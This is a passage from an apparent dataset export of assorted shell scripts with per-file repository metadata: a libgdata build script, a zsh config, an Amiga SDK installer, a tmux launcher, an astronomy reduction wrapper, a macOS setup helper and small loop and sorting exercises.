fi

git checkout $CURRENT
git rebase $MAIN
| true |
fe2c4ba9176899da2e5c832465e2a717ace0bb65 | Shell | dslm4515/BMLFS | /build-scripts/libgdata.build | UTF-8 | 1,708 | 3.046875 | 3 | [] | no_license | #! /bin/bash
# libgdata
# Source: https://download.gnome.org/sources/libgdata/0.17/libgdata-0.17.13.tar.xz
#
# $BUILD = Directory to temporarily install
# $PKGS = Directory to store built packages
#
# DEPS
# Required: libsoup, gnome-online-accounts, GTK+3, JSON-GLib, Vala
# Recommended: Gcr, git, gobject-introspection
# Optional: GTK-Doc, liboauth, uhttpmock

# Configure, build and DESTDIR-install into $BUILD; every step is chained
# with && so a failure stops the chain.
mkdir build &&
cd build &&
meson --prefix=/usr -Dgtk_doc=false \
      -Dalways_build_tests=false \
      -Doauth1=enabled .. &&
read -p "Compile?" && ninja -j2 &&
sudo -S DESTDIR=$BUILD ninja install &&
cd $BUILD && sudo -S mkdir -v ${BUILD}/install &&
# Slackware package description; the quoted "EOF" keeps the content
# literal (no expansion). Do not edit the handy-ruler alignment.
cat > /tmp/slack-desc << "EOF"
# HOW TO EDIT THIS FILE:
# The "handy ruler" below makes it easier to edit a package description. Line
# up the first '|' above the ':' following the base package name, and the '|'
# on the right side marks the last column you can put a character in. You must
# make exactly 11 lines for the formatting to be correct. It's also
# customary to leave one space after the ':' except on otherwise blank lines.
|-----handy-ruler------------------------------------------------------|
libgdata: libgdata (library to access online services)
libgdata:
libgdata: Libgdata is a GLib-based library for accessing online service APIs
libgdata: using the GData protocol --- most notably, Google's services. It
libgdata: provides APIs to access the common Google services, and has full
libgdata: asynchronous support.
libgdata:
libgdata:
libgdata:
libgdata:
libgdata:
EOF
# Package the staged tree and clean the staging directory.
sudo -S mv -v /tmp/slack-desc install/ &&
sudo -S makepkg -l y -c n $PKGS/libgdata-0.17.13-$(uname -m)-mlfs.txz &&
sudo -S rm -rf ${BUILD}/*
| true |
d2aa8f3f9855dfbb30bcf25e774f58d346e7bcc8 | Shell | Alexgunning/dotfiles | /.zshrc | UTF-8 | 5,529 | 2.578125 | 3 | [] | no_license | # If you come from bash you might have to change your $PATH.
# export PATH=$HOME/bin:/usr/local/bin:$PATH
# Path to your oh-my-zsh installation.
export ZSH=~/.oh-my-zsh
# Set name of the theme to load. Optionally, if you set this to "random" # it'll load a random theme each time that oh-my-zsh is loaded.
# See https://github.com/robbyrussell/oh-my-zsh/wiki/Themes
ZSH_THEME="alex-pygmalion"
# Uncomment the following line to use case-sensitive completion.
# CASE_SENSITIVE="true"
# Uncomment the following line to use hyphen-insensitive completion. Case
# sensitive completion must be off. _ and - will be interchangeable.
# HYPHEN_INSENSITIVE="true"
# Uncomment the following line to disable bi-weekly auto-update checks.
# DISABLE_AUTO_UPDATE="true"
# Uncomment the following line to change how often to auto-update (in days).
# export UPDATE_ZSH_DAYS=13
# Uncomment the following line to disable colors in ls.
# DISABLE_LS_COLORS="true"
# Uncomment the following line to disable auto-setting terminal title.
DISABLE_AUTO_TITLE="true"
# Uncomment the following line to enable command auto-correction.
# ENABLE_CORRECTION="true"
# Uncomment the following line to display red dots whilst waiting for completion.
# COMPLETION_WAITING_DOTS="true"
# Uncomment the following line if you want to disable marking untracked files
# under VCS as dirty. This makes repository status check for large repositories
# much, much faster.
# DISABLE_UNTRACKED_FILES_DIRTY="true"
# Uncomment the following line if you want to change the command execution time
# stamp shown in the history command output.
# The optional three formats: "mm/dd/yyyy"|"dd.mm.yyyy"|"yyyy-mm-dd"
# HIST_STAMPS="mm/dd/yyyy"
# Would you like to use another custom folder than $ZSH/custom?
# ZSH_CUSTOM=/path/to/new-custom-folder
# Which plugins would you like to load? (plugins can be found in ~/.oh-my-zsh/plugins/*)
# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/
# Example format: plugins=(rails git textmate ruby lighthouse)
# Add wisely, as too many plugins slow down shell startup.
plugins=(git virtualenv)
source $ZSH/oh-my-zsh.sh
# User configuration
# export MANPATH="/usr/local/man:$MANPATH"
# You may need to manually set your language environment
# export LANG=en_US.UTF-8
# Preferred editor for local and remote sessions
# if [[ -n $SSH_CONNECTION ]]; then
# export EDITOR='vim'
# else
# export EDITOR='mvim'
# fi
# Compilation flags
# export ARCHFLAGS="-arch x86_64"
# ssh
# export SSH_KEY_PATH="~/.ssh/rsa_id"
# Set personal aliases, overriding those provided by oh-my-zsh libs,
# plugins, and themes. Aliases can be placed here, though oh-my-zsh
# users are encouraged to define aliases within the ZSH_CUSTOM folder.
# For a full list of active aliases, run `alias`.
#
# Example aliases
# alias zshconfig="mate ~/.zshrc"
# alias ohmyzsh="mate ~/.oh-my-zsh"
# --- Editor / shell aliases ---
alias ls="ls -Gp"
#alias vi="nvim"
#alias vim="nvim"
alias vi="nvim"
alias vim="nvim"
alias vimr="/Applications/MacVim.app/Contents/MacOS/Vim"
alias gvim='/Applications/MacVim.app/Contents/MacOS/Vim -g'
alias mvim='/Applications/MacVim.app/Contents/MacOS/Vim -g'
# alias python="python3"
alias z="vi ~/.zshrc"
alias sz="source ~/.zshrc"
# --- Git / project aliases ---
alias s="git status"
alias k="gitk --all&"
alias gh="grep_history"
# NOTE(review): this shadows the `test` builtin/`/usr/bin/test` in
# interactive shells.
alias test="run_test"
alias drop="mongo RoninServer --eval 'db.dropDatabase()'"
alias load="mongorestore -d RoninServer --archive=/Users/cfsagunning/dbs/RoninServer.Devnode.2017-07-19.5pm.gz"
alias reload="mongo RoninServer --eval 'db.dropDatabase()'; mongorestore -d RoninServer --archive=/Users/cfsagunning/dbs/RoninServer.Devnode.2017-07-19.5pm.gz; mongo RoninServer --eval 'db.agendaJobs.drop()'"
alias graph="git log --graph --oneline --all"
alias getgrunt="npm install grunt grunt-cli grunt-contrib-watch grunt-shell"
alias dtest="rm -rf ~/ronin_server_node/src/tests"
alias utest="git checkout -- src/tests"
alias reb="npm run rebuild && npm run restart"
alias AndroidStudio="open -a /Applications/Android\ Studio.app"
alias caf="caffeinate -d"
alias nuget="mono /usr/local/bin/nuget.exe"
# alias empty="git commit --allow-empty -m 'empty commit'"
# --- Android SDK ---
export ANDROID_HOME='/Users/cfsagunning/Library/Android/sdk'
export PATH=${PATH}:${ANDROID_HOME}/tools
export PATH=${PATH}:${ANDROID_HOME}/platform-tools
# NOTE(review): this prepends a *file* (the python3 binary path), not a
# directory, to PATH — PATH entries must be directories; confirm intent.
export PATH=/usr/local/bin/python3:$PATH
# Create an empty commit whose message is tagged with the RWS-### ticket
# id extracted from the current branch name.
function empty() {
    local branch commitmessage
    branch=$(git branch | awk '/^\*/ { print $2 }' | grep -o 'RWS-[0-9]\+')
    commitmessage="${branch} empty commit"
    # BUG FIX: the -m argument must be quoted — unquoted it word-split,
    # and git treated "empty" and "commit" as pathspecs, failing the
    # commit.
    git commit --allow-empty -m "$commitmessage"
}
#source ~/prefs/git-completion.bash
# Personal scripts take precedence on PATH.
PATH=~/scripts:$PATH
export DYLD_FORCE_FLAT_NAMESPACE=1
# cdf: cd to the folder shown in the frontmost Finder window (macOS).
alias cdf="eval \"cd \\\"\\\`osascript -e 'tell app \\\\\\\"Finder\\\\\\\" to return the POSIX path of (target of window 1 as alias)'\\\`\\\"\""
#bindkey -v
#export KEYTIMEOUT=1
#####PASTED STUFF
#function zle-line-init zle-keymap-select {
#VIM_PROMPT="%{$fg_bold[yellow]%} [% NORMAL]% %{$reset_color%}"
#RPS1="${${KEYMAP/vicmd/$VIM_PROMPT}/(main|viins)/} $EPS1"
#zle reset-prompt
#}
##FIX DOESN'T WORK
#bindkey jk vi-cmd-mode
#zle -N zle-line-init
#zle -N zle-keymap-select
# --- nvm (Node version manager) ---
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"  # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion"  # This loads nvm bash_completion
# added by travis gem
[ -f /Users/cfsagunning/.travis/travis.sh ] && source /Users/cfsagunning/.travis/travis.sh
# BUGFIX: "[ /usr/local/bin/kubectl ]" only tests that the string is
# non-empty, so it was always true; use -x to check the binary exists
# and is executable before sourcing its completion.
if [ -x /usr/local/bin/kubectl ]; then source <(kubectl completion zsh); fi
source /usr/local/bin/aws_zsh_completer.sh
| true |
27796bcc931aac9c860b42df6e1309f0ca19c5f8 | Shell | Kefikhalil/holberton-system_engineering-devops | /0x04-loops_conditions_and_parsing/4-if_9_say_hi | UTF-8 | 181 | 3.46875 | 3 | [] | no_license | #!/usr/bin/env bash
# Print "Holberton School" ten times; right after the 9th line, also
# print "Hi".
count=1
while [ "$count" -le 10 ]
do
    echo "Holberton School"
    if [ "$count" -eq 9 ]
    then
        echo "Hi"
    fi
    count=$((count + 1))
done
481787be3658ef6e6a5165787aed567fec5dc229 | Shell | SteveMoody73/amiga-gcc | /sdk/install | UTF-8 | 6,646 | 3.4375 | 3 | [] | no_license | #!/bin/bash
# install - copy headers/libs/FDs for one SDK component into the toolchain.
#
# Usage: install <action> <sdk-name> <prefix>
#   action   : "install" or "clean"
#   sdk-name : sdk/<sdk-name>.sdk describes the component
#   prefix   : amiga-gcc installation prefix (contains bin/, m68k-amigaos/)
if [ ! -e "sdk/$2.sdk" ]; then
  echo "sdk/$2.sdk not found"
  exit 1
fi
case $1 in
install)
  # Each line of the .sdk file is a colon-separated directive:
  # <keyword>:<arg1>:<arg2>...
  while IFS='' read -r line || [[ -n "$line" ]]; do
    a=(${line//:/ })
    case ${a[0]} in
      Short | Version | Author | Uploader | Type | Replaces | Architecture)
        # Purely informational metadata - just echo it.
        echo "$line"
        ;;
      Url)
        # Fetch the component, either from git or as an lha archive.
        file=$(basename ${a[2]})
        if [ "${a[1]}" == "git" ]; then
          if [ ! -e "projects/$file" ]; then
            pushd projects
            # BUGFIX: group cleanup and exit; previously
            # "|| rm -rf $file; exit 1" exited unconditionally after
            # every clone (";" is not part of the "||" branch).
            git clone ${a[1]}:${a[2]} || { rm -rf "$file"; exit 1; }
            popd;
          fi
          pushd projects/$file
          git pull
          popd
          rsync projects/$file/* build/$2/
        else
          if [ ! -e "download/$file" ]; then
            echo wget ${a[1]}:${a[2]} -O download/$file
            # BUGFIX: use a brace group instead of a subshell so that
            # "exit 1" aborts this script, not just the subshell.
            wget ${a[1]}:${a[2]} -O download/$file || { rm -f "download/$file"; exit 1; }
          fi
          if [ ! -e "build/$2" ] || [ "$(ls -l build/$2)" == "total 0" ]; then
            mkdir -p build/$2
            pushd build/$2
            lha x "../../download/$file" && $3/bin/lha x "../../download/$file"
            popd
          fi
        fi
        ;;
      fd2sfd)
        # Convert an .fd function description + clib proto into an .sfd.
        fd=${a[1]}
        proto=${a[2]}
        file=$(basename $fd)
        name=${file%???}
        mkdir -p $3/m68k-amigaos/lib/sfd/
        $3/bin/fd2sfd -o $3/m68k-amigaos/lib/sfd/$name.sfd $3/m68k-amigaos/lib/fd/$fd $3/m68k-amigaos/include/$proto || exit 1
        ;;
      sfdc)
        # Generate proto/inline/lvo headers from an .sfd description.
        sfd=${a[1]}
        file=$(basename $sfd)
        name=${file%????}
        mkdir -p $3/m68k-amigaos/include/proto/
        $3/bin/sfdc --mode=proto --target=m68k-amigaos --output=$3/m68k-amigaos/include/proto/$name.h $3/m68k-amigaos/lib/sfd/$sfd || exit 1
        # Lower-case the include paths referenced from the generated header.
        sed -i.bak -e 's/\(<clib\/.*>\)/\L\1/' -e 's/\(<defines\/.*>\)/\L\1/' -e 's/\(<inline\/.*>\)/\L\1/' -e 's/\(<pragmas\/.*>\)/\L\1/' $3/m68k-amigaos/include/proto/$name.h
        rm $3/m68k-amigaos/include/proto/$name.h.bak
        mkdir -p $3/m68k-amigaos/include/inline/
        $3/bin/sfdc --mode=macros --target=m68k-amigaos --output=$3/m68k-amigaos/include/inline/$name.h $3/m68k-amigaos/lib/sfd/$sfd || exit 1
        mkdir -p $3/m68k-amigaos/include/lvo/
        $3/bin/sfdc --mode=lvo --target=m68k-amigaos --output=$3/m68k-amigaos/include/proto/$name.i $3/m68k-amigaos/lib/sfd/$sfd || exit 1
        if [ "${a[2]}" != "" ] && [ "${a[3]}" != "" ]; then
          # Optional rename pass over the generated headers.
          echo fixup names from ${a[2]} to ${a[3]}
          echo sed -i.bak -e "s/${a[2]}/${a[3]}/" $3/m68k-amigaos/include/proto/$name.h
          sed -i.bak -e "s/${a[2]}/${a[3]}/" $3/m68k-amigaos/include/proto/$name.h
          sed -i.bak -e "s/${a[2]}/${a[3]}/" $3/m68k-amigaos/include/proto/$name.i
          sed -i.bak -e "s/${a[2]}/${a[3]}/" $3/m68k-amigaos/include/inline/$name.h
          rm $3/m68k-amigaos/include/proto/$name.h.bak $3/m68k-amigaos/include/proto/$name.i.bak $3/m68k-amigaos/include/inline/$name.h.bak
        fi
        ;;
      stubs)
        # Build auto-open stubs and add them to every libstubs.a variant.
        # The archive updates are serialized with a lock file because
        # several components may be installed in parallel.
        sfd=${a[1]}
        file=$(basename $sfd)
        name=${file%????}
        $3/bin/sfdc --mode=autoopen --target=m68k-amigaos --output=build/$2/$name.c $3/m68k-amigaos/lib/sfd/$name.sfd || exit 1
        sed -i.bak -e 's/__inline//g' -e 's/: \"d0\",/:/g' build/$2/$name.c || exit 1
        echo $3/bin/m68k-amigaos-gcc -Os -noixemul -fomit-frame-pointer build/$2/$name.c -c
        $3/bin/m68k-amigaos-gcc -Os -noixemul -fomit-frame-pointer build/$2/$name.c -c -o build/$2/$name.o || exit 1
        echo $3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libstubs.a build/$2/$name.o
        (
        flock -x 200
        $3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libstubs.a build/$2/$name.o || exit 1
        $3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libb/libstubs.a build/$2/$name.o || exit 1
        $3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libm020/libstubs.a build/$2/$name.o || exit 1
        $3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libm020/libb/libstubs.a build/$2/$name.o || exit 1
        $3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/libm020/libb32/libstubs.a build/$2/$name.o || exit 1
        ) 200>/tmp/amiga-gcc-libstubs-lock
        ;;
      lib)
        # Build the glue library lib<name>.a from the .sfd stubs.
        sfd=${a[1]}
        file=$(basename $sfd)
        name=${file%????}
        $3/bin/sfdc --mode=stubs --target=m68k-amigaos --output=build/$2/lib$2.c $3/m68k-amigaos/lib/sfd/$name.sfd || exit 1
        sed -i.bak -e 's/__inline//g' -e 's/: \"d0\",/:/g' build/$2/lib$2.c || exit 1
        echo $3/bin/m68k-amigaos-gcc -Os -noixemul -fomit-frame-pointer build/$2/lib$2.c -c
        $3/bin/m68k-amigaos-gcc -Os -noixemul -fomit-frame-pointer build/$2/lib$2.c -c -o build/$2/lib$2.o || exit 1
        echo $3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/lib$2.a build/$2/lib$2.o
        $3/bin/m68k-amigaos-ar r $3/m68k-amigaos/lib/lib$2.a build/$2/lib$2.o || exit 1
        ;;
      redirinc)
        # Create a one-line header that redirects to another header.
        echo creating redirecting header $3/m68k-amigaos/include/${a[1]}
        echo "#include \"${a[2]}\"" >$3/m68k-amigaos/include/${a[1]}
        ;;
      symlink)
        echo creating symlink from $3/m68k-amigaos/${a[2]} to $3/m68k-amigaos/${a[1]}
        rm -rf $3/m68k-amigaos/${a[2]}
        ln -s $3/m68k-amigaos/${a[1]} $3/m68k-amigaos/${a[2]}
        ;;
      *)
        # Anything else is a file to copy; "src = dst" renames on copy.
        if [ "$line" != "" ]; then
          if [ "${a[1]}" == "=" ]; then
            file=${a[2]}
            line=${a[0]}
            cp build/$2/$line build/$2/$(dirname $line)/$file
          else
            file=$(basename $line)
          fi
          dir=$(basename $(dirname $line))
          # Route the file to its target directory by extension.
          if [[ $file == *.h ]] || [[ $file == *.i ]]; then
            mkdir -p "$3/m68k-amigaos/include/$dir"
            echo cp "build/$2/$line" "$3/m68k-amigaos/include/$dir/$file"
            cp "build/$2/$line" "$3/m68k-amigaos/include/$dir/$file"
          elif [[ $file == *.guide ]]; then
            mkdir -p "$3/m68k-amigaos/guide"
            echo cp "build/$2/$line" "$3/m68k-amigaos/guide/$file"
            cp "build/$2/$line" "$3/m68k-amigaos/guide/$file"
          elif [[ $file == *.doc ]]; then
            mkdir -p "$3/m68k-amigaos/doc"
            echo cp "build/$2/$line" "$3/m68k-amigaos/doc/$file"
            cp "build/$2/$line" "$3/m68k-amigaos/doc/$file"
          elif [[ $file == *.sfd ]]; then
            mkdir -p "$3/m68k-amigaos/lib/sfd"
            echo cp "build/$2/$line" "$3/m68k-amigaos/lib/sfd/$file"
            cp "build/$2/$line" "$3/m68k-amigaos/lib/sfd/$file"
          elif [[ $file == *.fd ]]; then
            mkdir -p "$3/m68k-amigaos/lib/fd"
            echo cp "build/$2/$line" "$3/m68k-amigaos/lib/fd/$file"
            cp "build/$2/$line" "$3/m68k-amigaos/lib/fd/$file"
          elif [[ $file == *.a ]]; then
            echo cp "build/$2/$line" "$3/m68k-amigaos/lib/$file"
            cp "build/$2/$line" "$3/m68k-amigaos/lib/$file"
          fi
        fi
        ;;
    esac
  done < "sdk/$2.sdk"
  ;;
clean)
  rm -rf build/$2
  ;;
esac
| true |
3ebf878d5920f4abdd87a78682c2bd8082437568 | Shell | joseph8th/unm-cs | /CS251_projects/SAry/conf_script | UTF-8 | 680 | 3.59375 | 4 | [] | no_license | #!/bin/bash
# conf_script -- Run SPQR with sample configuration files in ./sampleconf/

##### Functions

# Print the option summary.
function usage
{
    # BUGFIX: the old message advertised "-nl", an option this script
    # never parses; list the options the case statement actually accepts.
    echo "usage: conf_script [[-f file] [-i]] | [-h]"
}

##### Main

interactive=                   # set to 1 by -i/--interactive
filename=~/system_page.html    # default output file, overridable with -f

# Parse command-line arguments.
while [ "$1" != "" ]; do
    case $1 in
        -f | --file )           shift
                                filename=$1
                                ;;
        -i | --interactive )    interactive=1
                                ;;
        -h | --help )           usage
                                exit
                                ;;
        * )                     usage
                                exit 1
    esac
    shift
done
0713918f13e753dff8eb3fe31895c61a91c11ff7 | Shell | JorgeGarciaxyz/dotfiles | /linux/tmux/scripts/apptegy.sh | UTF-8 | 895 | 3.515625 | 4 | [] | no_license | #!/bin/bash
SESSION="work"

# Build the "work" tmux session (thrillshare and forms project windows)
# unless it already exists, then attach or switch to it.
if ! tmux has-session -t=$SESSION 2> /dev/null; then
  TMUX='' tmux new-session -d -s "$SESSION"

  # open_in <idx> <dir>: type "cd <dir>" + "clear" into window <idx>.
  open_in() {
    tmux send-keys -t $SESSION:"$1" "cd $2" C-m "clear" C-m
  }

  tmux rename-window -t 0 'ts'
  open_in 0 '~/Work/thrillshare'
  tmux new-window -t $SESSION:1 -n 'ts vim'
  open_in 1 '~/Work/thrillshare'
  tmux new-window -t $SESSION:2 -n 'forms'
  open_in 2 '~/Work/forms'
  tmux new-window -t $SESSION:3 -n 'forms vim'
  open_in 3 '~/Work/forms'
  tmux new-window -t $SESSION:4 -n 'shell'
fi

# Attach when called from a plain shell; switch when already inside tmux.
if [[ -z "$TMUX" ]]; then
  tmux attach -t "$SESSION"
else
  tmux switch-client -t "$SESSION"
fi
| true |
36207205ec3658fed42b0132193c3578369dac09 | Shell | ryanwilsond/LowLevel | /EMD/OperatingSystems/COS.0.4/run.sh | UTF-8 | 563 | 2.8125 | 3 | [] | no_license | #assemble boot.s file
# Assemble the 32-bit multiboot entry stub.
as --32 src/boot.s -o boot.o
# Compile the freestanding C kernel (no hosted stdlib, gnu99).
gcc -m32 -c src/kernel.c -o kernel.o -std=gnu99 -ffreestanding -O2 -Wall -Wextra
# Link kernel.o and boot.o with the custom linker script (no libc).
ld -m i386pe -T src/link.ld kernel.o boot.o -o COS.bin -nostdlib
# Sanity-check that COS.bin carries a valid x86 multiboot header.
grub-file --is-x86-multiboot COS.bin
# Stage the bootable ISO tree for GRUB and build the image.
mkdir -p isodir/boot/grub
cp COS.bin isodir/boot/COS.bin
cp grub.cfg isodir/boot/grub/grub.cfg
grub-mkrescue -o COS.iso isodir
# Boot the resulting image in QEMU.
qemu-system-x86_64 -cdrom COS.iso
| true |
b04663d7a735bfae1632f0abd25ddb51d7067b16 | Shell | hieuha/Download-Data-Canadian-Astronomy | /red2.sh | UTF-8 | 2,750 | 3.734375 | 4 | [] | no_license | #! /bin/bash
# This script will only work if run using the source command (.)
# which will execute the script in the current (bash) shell.
# Source: http://www.paulruffle.com/oracdr.htm
# note: should not need these as they should be in .bashrc
# export STARLINK_DIR=/hcm/Harry/Radio-Astronomy/Software/star-2015B
# source $STARLINK_DIR/etc/profile

CURRENT_FOLDER=`pwd`/

# Print usage information.
error_msg ()
{
    echo
    echo "Usage: source red2.sh datadir mypar"
    echo "Example: source red2.sh hcop mypar.ini"
    echo
}

MY_MOLECULAR=$CURRENT_FOLDER$1
MY_PARINI=$CURRENT_FOLDER$2

# set SLS data sub-directory from command line argument
SLS_DATA_DIR=$MY_MOLECULAR

# set data in and out paths to match standard jac oracdr pathnames
UTDATE=`date +%Y%m%d`
SLS_DATA_IN=${SLS_DATA_DIR}/raw
SLS_DATA_OUT=${SLS_DATA_DIR}/reduced/acsis/${UTDATE}

# NOTE(review): the script is documented to be sourced, yet the error
# paths below mix "exit 1" (which terminates the calling shell when
# sourced) and "return" - confirm which behaviour is intended.
if [ $# -lt 2 ]; then
    echo "Error! You have not specified enough parameters"
    error_msg
    exit 1
fi

# test for correct data sub-directory name
if [ ! -d "$MY_MOLECULAR" ]; then
    echo "Error! Data sub-directory $MY_MOLECULAR does not exist"
    return
else
    # Build the list of raw .sdf files to reduce.
    MY_SERLIST=$SLS_DATA_IN/ser.list
    /bin/ls -1 $MY_MOLECULAR/raw/*sdf* > $MY_SERLIST
fi

# BUGFIX: this existence check previously appeared twice back to back;
# the duplicate block has been removed.
if [ ! -f "$MY_PARINI" ]; then
    echo "parini file not found!"
    exit 1
fi

echo "Data directory: ${SLS_DATA_DIR}"
echo "UT date of obs: ${UTDATE}"
echo

# make a directory for the reduced data (but check first)
if [ -d ${SLS_DATA_OUT} ]; then
    if [ -e ${SLS_DATA_OUT}/log.qa ]; then
        echo "Warning! ${SLS_DATA_OUT}"
        echo "  output directory appears to contain reduced data"
    else
        echo "Warning! ${SLS_DATA_OUT}"
        echo "  output data directory already exists"
    fi
    echo ""
    echo -n "Are you sure you want to continue? (y)es "
    read ans
    if [ "$ans" != "y" ] && [ "$ans" != "Y" ] ; then
        echo ""
        echo "OK terminating script"
        echo ""
        return
    fi
    echo ""
else
    mkdir -p ${SLS_DATA_OUT}
fi

export ORAC_DATA_ROOT=${SLS_DATA_DIR}

# call oracdr_acsis which sources oracdr_start.sh for ACSIS instrument
oracdr_acsis ${UTDATE}

# reset data in and out paths as oracdr_start.sh sets default paths!
# ORAC_DATA_IN: the location where data are read from.
# If running with -loop flag, this is the location of the flag files,
# rather than the data files.
export ORAC_DATA_IN=${SLS_DATA_IN}
export ORAC_DATA_OUT=${SLS_DATA_OUT}
export ORAC_NFS_OK=1
echo ORAC_DATA_IN=$ORAC_DATA_IN
echo ORAC_DATA_OUT=$ORAC_DATA_OUT

# now we can run oracdr
oracdr -loop file -files $MY_SERLIST REDUCE_SCIENCE_NARROWLINE -recpars $MY_PARINI -nodisplay -log s -batch

echo "Delete Raw $MY_SERLIST"
#rm -rf "$MY_MOLECULAR/raw/"

unset ORAC_DATA_IN
unset ORAC_DATA_OUT
| true |
27c9835ce18ad8bd0c254f205655c30024639956 | Shell | suevip/thor | /bin/thor.sh | UTF-8 | 1,554 | 3.671875 | 4 | [
"MIT"
] | permissive | #!/bin/sh
# thor.sh - launch a Kafka Connect standalone worker for Thor.
# Usage: thor.sh worker.properties connect1.properties [...]
if [ x"$1" = x ]; then
    echo "Usage : thor.sh [worker.properties] [connect.properties ...]"
    exit 1
fi

# Locate the newest installed JDK 1.8.0 under /usr/java.
jdk8=$(ls /usr/java/ | grep 1.8.0)
if [ "x$jdk8" = "x" ]; then
    echo "Java version must be 1.8.0 or later! current version is "$JAVA_VERSION
    exit
fi

jdk=""
for dir in $jdk8;
do
    # BUGFIX: "[[ $dir > $jdk ]]" is a bashism that fails under the
    # #!/bin/sh shebang (e.g. dash); use expr's POSIX string comparison.
    if expr "$dir" \> "$jdk" > /dev/null; then
        jdk=$dir
    fi
done

export JAVA_HOME=/usr/java/$jdk
export CLASSPATH=.:$JAVA_HOME/lib:$JAVA_HOME/lib/tools.jar:$JAVA_HOME/lib/dt.jar
export PATH=$JAVA_HOME/bin:$PATH

# JAVA_VERSION=$(java -version 2>&1 | awk 'NR==1{ gsub(/"/,""); print $3 }i' | awk -F '_' '{print $1}')
# if [[ "x$JAVA_VERSION" < "x1.8.0" ]]; then
#     echo "Java version must be 1.8.0 or later! current version is "$JAVA_VERSION
#     exit
# fi

base_dir=$(dirname $0)

# Default log4j / heap settings unless the caller already exported them.
if [ "x$THOR_LOG4J_OPTS" = "x" ]; then
    export THOR_LOG4J_OPTS="-Dlog4j.configurationFile=file:$base_dir/../config/log4j2.xml"
fi

if [ "x$THOR_HEAP_OPTS" = "x" ]; then
    export THOR_HEAP_OPTS="-Xmx1G -Xms1G"
fi

# EXTRA_ARGS="-name thor -loggc"

# The worker config must define a local offset-storage file.
offset_line=$(sed -n '/^offset.storage.file.filename=/p' $1)
offset_file=${offset_line#*=}
if [ x"$offset_file" = x ]; then
    echo $1" 中必须配置存储 offset 本地文件,例如:offset.storage.file.filename=/tmp/connect.offset"
    exit 1
fi

# Create the offset file's directory, resolving a relative path against
# this script's directory.
offset_dir=${offset_file%/*}
# BUGFIX: "${offset_dir:0:1}" substring expansion is a bashism; use a
# POSIX "case" pattern to test for an absolute path instead.
case $offset_dir in
    /*) ;;
    *) offset_dir=$base_dir"/"$offset_dir ;;
esac
if [ ! -d $offset_dir ]; then
    mkdir -p $offset_dir
fi

exec $(dirname $0)/run-class.sh $EXTRA_ARGS org.apache.kafka.connect.cli.ConnectStandalone "$@"
| true |
035611e4097ad4602be06f41e43ca6c0f8ef9ac1 | Shell | janosh/macos-setup | /setup/system-settings.sh | UTF-8 | 2,523 | 3.734375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# --- Helper functions ---

# Exit cleanly (status 0) if the user aborts with Ctrl-C.
trap 'exit 0' SIGINT # exit cleanly if aborted with ⌃c

# request <message> <app> [args...]
# Print a bullet-prefixed message, then open <app> with any extra args
# and block until the user quits it.
request() { # Output a message and open an app.
  local message="${1}"
  local app="${2}"
  shift 2
  echo "$(tput setaf 5)•$(tput sgr0) ${message}"
  open -Wa "${app}" --args "$@" # Don't continue until app closes.
}

# request_preferences <message>
# Convenience wrapper: 'request' targeting System Preferences.
request_preferences() { # 'request' for System Preferences.
  request "${1}" 'System Preferences'
}

# preferences_pane <pane-id>
# Open System Preferences on the given pane (output suppressed).
preferences_pane() { # Open 'System Preferences' in specified pane.
  osascript -e "tell application \"System Preferences\"
    reveal pane \"${1}\"
    activate
  end tell" &> /dev/null
}

# preferences_pane_anchor <anchor> <pane-id>
# Open System Preferences on a specific tab (anchor) of a pane.
preferences_pane_anchor() { # Open 'System Preferences' in specified pane and tab.
  osascript -e "tell application \"System Preferences\"
    reveal anchor \"${1}\" of pane \"${2}\"
    activate
  end tell" &> /dev/null
}
# Auto-close any open System Preferences panes, to prevent them from
# overriding settings we’re about to change
osascript -e 'tell application "System Preferences" to quit'

# --- Main script ---

# Intro banner; the sed strips the source-level two-space indentation.
echo "This scripts requires manual interaction. It opens the appropriate System Settings panels, informs what needs to be done, and pauses until System Settings is closed.
  Unless prefixed with the message 'ALL TABS', all changes can be performed in the opened tab.
  After the changes are done, close the app and the script will continue.
" | sed -E 's/ {2}//'

# Each pair below opens a Preferences pane, then waits for the user to
# make the described change and close the app.
preferences_pane 'com.apple.preferences.Bluetooth'
request_preferences 'Add Bluetooth peripherals and show Bluetooth in menu bar.'

preferences_pane 'com.apple.preference.trackpad'
request_preferences 'Set Trackpad preferences.'

preferences_pane 'com.apple.preference.mouse'
request_preferences 'Set Mouse preferences.'

preferences_pane_anchor 'Mouse' 'com.apple.preference.universalaccess'
request_preferences 'Under "Trackpad Options…", enable three finger drag.'

preferences_pane_anchor 'Dictation' 'com.apple.preference.keyboard'
request_preferences 'Download other languages.'

preferences_pane 'com.apple.preferences.AppleIDPrefPane'
request_preferences "Check what you want synced to iCloud."

preferences_pane 'com.apple.preferences.internetaccounts'
request_preferences 'Remove Game Center.'

preferences_pane 'com.apple.preferences.users'
request_preferences 'Turn off Guest User account.'

preferences_pane 'com.apple.preference.printfax'
request_preferences 'Add printers.'

preferences_pane 'com.apple.preference.security'
request_preferences 'Set delay after sleep before prompting for password on wake.'
| true |
79f2dee932acba17d4874f44acc128bf7e6b7b2f | Shell | obaryo/Bash-Activities-Compilation | /task6_ sorting.sh | UTF-8 | 567 | 3.40625 | 3 | [] | no_license | array=()
# Bubble-sort integers read (space-separated, one line) from stdin.
echo "Input random integers: "
# BUGFIX: -r stops read from mangling backslashes in the input.
read -r arr
array+=($arr)          # word-split the input line into array elements
len=${#array[@]}
#echo $len

echo "Array in original order: "
echo ${array[@]}

# Classic bubble sort: after pass i the largest i+1 values are in place.
for ((i = 0; i < len; i++))
do
    for ((j = 0; j < len - i - 1; j++))
    do
        # BUGFIX: quote the operands so empty elements cannot break the
        # integer comparison.
        if [ "${array[j]}" -gt "${array[$((j+1))]}" ]
        then
            # Swap the adjacent out-of-order pair.
            tmp=${array[j]}
            array[$j]=${array[$((j+1))]}
            array[$((j+1))]=$tmp
        fi
    done
done

echo
echo "Array after sorting:"
echo ${array[@]}
